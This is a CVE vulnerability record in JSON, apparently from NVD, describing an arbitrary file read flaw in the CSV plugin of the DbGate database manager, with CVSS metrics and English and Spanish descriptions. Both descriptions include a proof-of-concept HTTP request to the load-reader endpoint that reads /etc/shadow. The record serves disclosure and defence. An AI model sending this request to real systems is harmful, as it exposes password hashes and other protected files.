CVE-2025-50185

{"id": "CVE-2025-50185", "cveTags": [], "metrics": {"cvssMetricV40": [{"type": "Secondary", "source": "security-advisories@github.com", "cvssData": {"Safety": "NOT_DEFINED", "version": "4.0", "Recovery": "NOT_DEFINED", "baseScore": 7.0, "Automatable": "NOT_DEFINED", "attackVector": "NETWORK", "baseSeverity": "HIGH", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "exploitMaturity": "PROOF_OF_CONCEPT", "providerUrgency": "NOT_DEFINED", "userInteraction": "NONE", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "subIntegrityImpact": "NONE", "vulnIntegrityImpact": "NONE", "integrityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "availabilityRequirement": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "subConfidentialityImpact": "HIGH", "vulnConfidentialityImpact": "HIGH", "confidentialityRequirement": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED"}}]}, "published": "2025-07-26T04:16:04.207", "references": [{"url": "https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102", "source": "security-advisories@github.com"}, {"url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9", "source": "security-advisories@github.com"}, {"url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}], "vulnStatus": "Awaiting Analysis", "weaknesses": [{"type": "Secondary", "source": "security-advisories@github.com", "description": [{"lang": "en", "value": "CWE-29"}]}], "descriptions": [{"lang": "en", "value": "DbGate is cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue.\n\n\n\n\n\n\n```\nPOST /runners/load-reader HTTP/1.1\nHost: <REPLACE ME>\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: <REPLACE ME>\nContent-Type: application/json\nAuthorization: Bearer <REPLACE ME>\nContent-Length: 127\nOrigin: http://192.168.124.119:3000\nConnection: keep-alive\nCookie: <REPLACE ME>\nPriority: u=0\nCache-Control: max-age=0\n\n{\"functionName\":\"reader@dbgate-plugin-csv\",\"props\":{\"fileName\":\"/etc\\/shadow\",\"limitRows\":100}}\n\n```\n\n\n\nThe request payload:\n\n\n\nLines of the file being returned:\n"}, {"lang": "es", "value": "DbGate es un gestor de bases de datos multiplataforma. En las versiones 6.6.0 y anteriores, DbGate permite el acceso no autorizado a archivos debido a una validaci\u00f3n insuficiente de las rutas y los tipos de archivo. Un usuario con acceso a nivel de aplicaci\u00f3n puede recuperar datos de archivos arbitrarios en el sistema, independientemente de su ubicaci\u00f3n o tipo de archivo. El complemento no realiza las comprobaciones adecuadas del tipo de contenido y la extensi\u00f3n del archivo antes de leerlo. Como resultado, incluso archivos confidenciales accesibles solo para el usuario root pueden leerse a trav\u00e9s de la interfaz de la aplicaci\u00f3n. Actualmente no hay soluci\u00f3n para este problema.``` POST /runners/load-reader HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: Content-Type: application/json Authorization: Bearer Content-Length: 127 Origin: http://192.168.124.119:3000 Connection: keep-alive Cookie: Priority: u=0 Cache-Control: max-age=0 {\"functionName\":\"reader@dbgate-plugin-csv\",\"props\":{\"fileName\":\"/etc\\/shadow\",\"limitRows\":100}} ``` The request payload:  Lines of the file being returned: "}], "lastModified": "2025-07-29T14:14:55.157", "sourceIdentifier": "security-advisories@github.com"}